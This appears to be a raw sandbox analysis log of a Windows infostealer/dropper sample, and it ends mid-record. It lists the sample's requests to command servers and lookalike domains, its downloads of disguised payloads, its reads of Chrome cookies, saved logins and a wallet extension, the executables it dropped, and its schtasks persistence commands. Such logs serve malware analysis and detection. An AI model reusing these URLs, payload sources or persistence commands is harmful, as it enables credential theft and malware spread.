exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x73bb34b2
registers.esp: 35116100
registers.edi: 0
registers.eax: 0
registers.ebp: 35116140
registers.edx: 32
registers.ebx: 35116444
registers.esi: 0
registers.ecx: 12191776
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73bb4f99
0x395c6ed
0x395c79a
0x395c808
0x38d0a09
0x38d1cba
0x38d129e
0x38d15cd
0x38e8939
0x38e9831
0x3916065
0x3916d41
0x391dbbe
0x391ddeb
0x397f571
0x397f654
zz_8wjnwjcywe8dtxxwfai7o+0x2424 @ 0x882424
zz_8wjnwjcywe8dtxxwfai7o+0x4658 @ 0x884658
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x73bb34b2
registers.esp: 35116100
registers.edi: 0
registers.eax: 0
registers.ebp: 35116140
registers.edx: 32
registers.ebx: 35116444
registers.esi: 0
registers.ecx: 12191776
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73bb4f99
0x395c6ed
0x395c79a
0x395c808
0x38d0a09
0x38d1cba
0x38d1290
0x38d15cd
0x38e8939
0x38e9095
0x3916eb3
0x391dbbe
0x391ddeb
0x397f571
0x397f654
zz_8wjnwjcywe8dtxxwfai7o+0x2424 @ 0x882424
zz_8wjnwjcywe8dtxxwfai7o+0x4658 @ 0x884658
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x73bb34b2
registers.esp: 35116516
registers.edi: 0
registers.eax: 0
registers.ebp: 35116556
registers.edx: 32
registers.ebx: 35116860
registers.esi: 0
registers.ecx: 11591728
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73bb4f99
0x395c6ed
0x395c79a
0x395c808
0x38d0a09
0x38d1cba
0x38d129e
0x38d15cd
0x38e8939
0x38e9095
0x3916eb3
0x391dbbe
0x391ddeb
0x397f571
0x397f654
zz_8wjnwjcywe8dtxxwfai7o+0x2424 @ 0x882424
zz_8wjnwjcywe8dtxxwfai7o+0x4658 @ 0x884658
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x73bb34b2
registers.esp: 35116516
registers.edi: 0
registers.eax: 0
registers.ebp: 35116556
registers.edx: 32
registers.ebx: 35116860
registers.esi: 0
registers.ecx: 11591728
1 0 0
suspicious_features Connection to IP address suspicious_request GET http://45.133.1.107/server.txt
suspicious_features Connection to IP address suspicious_request GET http://212.192.241.62/base/api/statistics.php
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://212.192.241.62/base/api/getData.php
suspicious_features Connection to IP address suspicious_request HEAD http://45.133.1.107/download/NiceProcessX64.bmp
suspicious_features Connection to IP address suspicious_request GET http://45.133.1.107/download/NiceProcessX64.bmp
suspicious_features Connection to IP address suspicious_request GET http://45.133.1.182/proxies.txt
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://212.192.241.62/service/communication.php
suspicious_features POST method with no referer header suspicious_request POST http://staticimg.youtuuee.com/api/?sid=2099253&key=fd52925171e83f42fc2ded8133aae222
request GET http://45.133.1.107/server.txt
request GET http://212.192.241.62/base/api/statistics.php
request POST http://212.192.241.62/base/api/getData.php
request HEAD http://45.133.1.107/download/NiceProcessX64.bmp
request GET http://45.133.1.107/download/NiceProcessX64.bmp
request GET http://45.133.1.182/proxies.txt
request POST http://212.192.241.62/service/communication.php
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request HEAD http://imgs.googlwaa.com/lqosko/p18j/cust9.exe
request HEAD http://dataonestorage.com/search_hyperfs_209.exe
request HEAD http://eguntong.com/pub33.exe
request HEAD http://www.hzradiant.com/askhelp42/askinstall42.exe
request GET http://imgs.googlwaa.com/lqosko/p18j/cust9.exe
request GET http://eguntong.com/pub33.exe
request HEAD http://www.hzradiant.com/askinstall42.exe
request GET http://www.hzradiant.com/askhelp42/askinstall42.exe
request GET http://www.hzradiant.com/askinstall42.exe
request GET http://dataonestorage.com/search_hyperfs_209.exe
request GET http://ip-api.com/json/
request GET http://staticimg.youtuuee.com/api/fbtime
request POST http://staticimg.youtuuee.com/api/?sid=2099253&key=fd52925171e83f42fc2ded8133aae222
request HEAD http://fouratlinks.com/installpartners/ShareFolder.exe
request GET http://fouratlinks.com/installpartners/ShareFolder.exe
request GET https://cdn.discordapp.com/attachments/891021838312931420/902505896159113296/PL_Client.bmp
request GET https://ipinfo.io/widget
request GET https://cdn.discordapp.com/attachments/896617596772839426/897483264074350653/Service.bmp
request GET https://cdn.discordapp.com/attachments/891006172130345095/905376099935080508/realV2_0301.bmp
request GET https://yandex.ru/
request GET https://yandex.ru/showcaptcha?cc=1&retpath=https%3A//yandex.ru/%3F_a09e8b000a282123c603bfc4a97c0306&t=2/1636005811/44697f40337ea4bdfd2de18621e47c54&u=7a6baacf-5dc3c4f0-2c5eb502-48cc2bf3&s=7586315df59045f770b5809e4db25d55
request GET https://cdn.discordapp.com/attachments/896617596772839426/899593707228135434/Cube_WW14.bmp
request GET https://cdn.discordapp.com/attachments/891006172130345095/905393686618193921/help0301.bmp
request GET https://d.gogamed.com/userhome/22/any.exe
request GET https://f.gogamef.com/userhome/22/23ce6573d0b61d1c6b7a3a8c1cdf07b2.exe
request GET https://el5en1977834657.s3.ap-south-1.amazonaws.com/kak.exe
request POST http://212.192.241.62/base/api/getData.php
request POST http://212.192.241.62/service/communication.php
request POST http://staticimg.youtuuee.com/api/?sid=2099253&key=fd52925171e83f42fc2ded8133aae222
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2316
region_size: 1351680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x037e0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2592
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 507904
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a5e000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2592
region_size: 876544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02260000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2796
region_size: 1351680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x038c0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2300
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 159744
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a7e000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2300
region_size: 278528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 32768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 40960
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00401000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 385024
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0040f000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01e20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 500
region_size: 851968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000006c0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 500
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000710000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 500
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1ed1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 500
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef214e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 500
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef214e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 500
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef214f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 500
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef214f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 500
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef214f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 500
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef214f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 500
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef214f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 500
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef214f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 500
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef214f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 500
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef214f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 500
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2150000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 500
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2150000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 500
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2150000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 500
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2150000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 500
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2150000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 500
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2151000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 500
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2151000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 500
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2151000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 500
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2151000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 500
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef214e000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 500
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 500
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff20000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 500
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 500
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 500
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 500
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 500
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 500
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00022000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 500
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 500
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 500
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00122000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 500
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000fd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 500
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0003c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 500
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00170000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 500
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
description Zz_8WJnWJcYwE8DTXxWfai7o.exe tried to sleep 193 seconds, actually delayed analysis time by 193 seconds
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 36\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 65\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 62\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 3\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 24\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 75\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 98\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 28\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 93\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 92\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 97\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 47\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 74\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 21\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 83\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 17\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 69\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 50\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 57\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 63\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 66\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 34\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 80\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 84\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 77\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 64\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 8\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 31\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 4\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 35\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 6\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 72\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 13\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 53\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 23\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 25\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 61\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 82\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 7\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 12\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 95\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 22\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 70\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 73\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 18\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 55\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 49\Cookies
name RT_ICON language LANG_NEUTRAL filetype data sublanguage SUBLANG_ARABIC_OMAN offset 0x0002f550 size 0x000002e8
name RT_ICON language LANG_NEUTRAL filetype data sublanguage SUBLANG_ARABIC_OMAN offset 0x0002f550 size 0x000002e8
name RT_GROUP_ICON language LANG_NEUTRAL filetype data sublanguage SUBLANG_ARABIC_OMAN offset 0x0002f838 size 0x00000022
name RT_VERSION language LANG_NEUTRAL filetype data sublanguage SUBLANG_ARABIC_OMAN offset 0x0002f160 size 0x000002c4
domain ipinfo.io
domain ip-api.com
file C:\Users\test22\Pictures\Adobe Films\82YG_xkSvDww7zcrD21MLhC8.exe
file C:\Users\test22\AppData\Local\Temp\pidHTSIGEi8DrAmaYu9K8ghN89.dll
file C:\Users\test22\Pictures\Adobe Films\egqRAdMP6vVHIbhfUato690f.exe
file C:\Users\test22\Documents\T9aZunTSaNJLBVfIkgF5mtQo.dll
file C:\Users\test22\AppData\Local\Temp\is-OTC82.tmp\_isetup\_shfoldr.dll
file C:\Users\test22\Pictures\Adobe Films\4dB197_1l7OerQHV9HHywWV_.exe
file C:\Users\test22\Pictures\Adobe Films\01NWJ3EqrrXXQcofclOmpgme.exe
file C:\Users\test22\Documents\Zz_8WJnWJcYwE8DTXxWfai7o.exe
file C:\Users\test22\Pictures\Adobe Films\xMRgMWwvt1Js2S4aChs4n12H.exe
file C:\Users\test22\Pictures\Adobe Films\d78LyqpVrYNmErU4VFpgMs_C.exe
file C:\Users\test22\AppData\Local\Temp\is-OTC82.tmp\DYbALA.exe
file C:\Users\test22\AppData\Local\Temp\is-OTC82.tmp\idp.dll
file C:\Users\test22\Pictures\Adobe Films\301tY1t7qg8_zDCV75DGJBHH.exe
file C:\Users\test22\Pictures\Adobe Films\xETOXMkcQToHPFfFUFdC0rZ7.exe
file C:\Users\test22\Pictures\Adobe Films\Nrsy5LhyZqW1S2cTgMnNCWa9.exe
file C:\Users\test22\Pictures\Adobe Films\Ehb3TX09sP7PC0g9ewmGExxA.exe
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
file C:\Users\test22\Pictures\Adobe Films\egqRAdMP6vVHIbhfUato690f.exe
file C:\Users\test22\Pictures\Adobe Films\Ehb3TX09sP7PC0g9ewmGExxA.exe
file C:\Users\test22\Pictures\Adobe Films\01NWJ3EqrrXXQcofclOmpgme.exe
file C:\Users\test22\Documents\Zz_8WJnWJcYwE8DTXxWfai7o.exe
file C:\Users\test22\Pictures\Adobe Films\xMRgMWwvt1Js2S4aChs4n12H.exe
file C:\Users\test22\Pictures\Adobe Films\4dB197_1l7OerQHV9HHywWV_.exe
file C:\Users\test22\Pictures\Adobe Films\xETOXMkcQToHPFfFUFdC0rZ7.exe
file C:\Users\test22\Pictures\Adobe Films\d78LyqpVrYNmErU4VFpgMs_C.exe
file C:\Users\test22\Pictures\Adobe Films\82YG_xkSvDww7zcrD21MLhC8.exe
file C:\Users\test22\AppData\Local\Temp\is-TS3P8.tmp\82YG_xkSvDww7zcrD21MLhC8.tmp
file C:\Users\test22\AppData\Local\Temp\is-OTC82.tmp\_isetup\_shfoldr.dll
file C:\Users\test22\AppData\Local\Temp\is-OTC82.tmp\idp.dll
file C:\Users\test22\AppData\Local\Temp\is-OTC82.tmp\DYbALA.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\egqRAdMP6vVHIbhfUato690f.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\egqRAdMP6vVHIbhfUato690f.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\Ehb3TX09sP7PC0g9ewmGExxA.exe
parameters:
